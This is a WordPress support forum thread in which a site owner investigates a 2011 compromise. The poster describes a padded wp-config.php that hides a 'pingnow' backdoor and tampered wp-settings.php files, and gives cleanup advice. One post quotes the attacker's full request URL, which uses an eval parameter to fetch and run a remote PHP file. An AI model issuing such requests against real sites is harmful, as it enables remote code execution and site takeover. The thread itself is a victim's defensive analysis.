afelotreyu

Yes MickeyRoush, it seems in my case I was attacked back in august by the timthumb issue and the attacker left a back door on one of the WordPress installs. which allowed him to execute that new iframe attack last week.

Anyways, Everything else seems fine so far, I am still working on database password changes and stuff like that. Better be safe than sorry.

Good luck to everyone!

Scott, I did the same in all my installs of wordpress, but the one with the actual problem had the issue hidden in the wp-config.php file. As I mention on my last post that file was the one allowing the “attackers” to break all other installs of wordpress, and no matter how many times I updated and reinstall WordPress on it, the issue was still there. I have to manually fix the problem with wp-config.php.

To be safe, I would suggest you to check all your installs and make sure the wp-config.php file is not infected. If you have a wp-config file with more than 100 lines you may have a problem.

Again the infected file has about 4000 lines and somewhere in line 2090 is where I found the pingnow funtion.

One thing I noticed about the wp-config file was that the “salt keys” was the same as the wp-config-sample.php.

Just be really carefull modifying that file and good luck!

ARG ?? I hate my day right now.. Sorry to the Owner of this post if I may be taking over your original post.

Anyways, I found where “pingnow” is. It seems the install of wordpress was compromised back in August, which cause the wp-config.php file to be modified and leaving a “backdoor”.

I found they wp-config.php contained a copy of the “wp-config-sample.php” plus 40000 lines of code from which most were blank and somewhere in the middle of the file I found this:
https://pastebin.com/h9zXeFN6

Long story, no matter how many times I removed the code from my wp-setttings.php if the permissions are not corrected as well every time someone requested https://blabla.domain/?pingnow=eval&file=https://91.196.216.20/99.php&pass=33e75ff09dd601bbe69f351039152189 all the wp-settings.php for all other installs get modified.

For does of you having this problems, check “ALL” of your wordpress installs, review the wp-config.php file and make sure you modify thet permissions to write on wp-config.php and wp-settings.php.

Hope that helps, I am now really tired ??

WordPress Support people, I hope you can find the answer or vulnerability in this post.

What seems to have happened is that one of my wordpress installs was compromised, from where the attacker modified all wp-settings.php files.

Here is the log of the “attack”
https://pastebin.com/dJVztNJ7

From which I got the following files:

pp.txt
just contains an echo echo'test'

tt.txt
https://pastebin.com/gcX19qe2

tt.php
https://pastebin.com/3vXsNLNL

and 99.php or 999.php is
https://pastebin.com/K3yuH2z7
This last file is what causes the overwrite of all wp-settings.php

Also, to add to the odd stuff I found a file named upd.php in wp-content. The file contained this:
https://pastebin.com/1y92Jf0C

Again, if I can find any more information I will post ??

Could someone please tell me what the “/?pingnow=eval” call does?

I think I found the source of the problem, and how other wordpress are affected, I have the files and will be linking soon, just need to understand what pingnow=eval does.

Sorry Scott, I am actually just starting to get involved with WordPress and I am not a 100% familiar with all the steps to secure a wordpress install, hopefully someone else can help.

At this point I have modified the permissions on wp-settings.php to only read, that should stop attackers from adding funny functions to my WP but will also stop my WordPress from executing proper updates when run via the Dashboard.

Again, I still need to figure out how they got in and modified my wp-settings in the first place.

A

Sorry Mod, did not see the rules, here is the link:
https://pastebin.com/YV38tGHE

UPDATE!

My wp-settings.php was compromised with the following function
https://pastebin.com/YV38tGHE

After a little digging I found the sys_get_temp_dir()= /tmp for me, was storing the file wp_inc which of course contained the bad <script> code.

Hope that helps some of you, I still need to figure out how they got in.
A

Hey Scott,

so to my giant surprise I also had this on my web page. Seems the attack was from Yesterday, Nov 3, 2011. I couldn’t really find how they dumped the code in it. But the page that nsathees reported the following code:

[Code moderated as per the Forum Rules. Please use the pastebin]

At this point, I gave up trying to find it. So I login to the admin side directly and did a reinstall of wordpress via the dashboard. Now the page is clean.

The question now is, how did they get in?\
A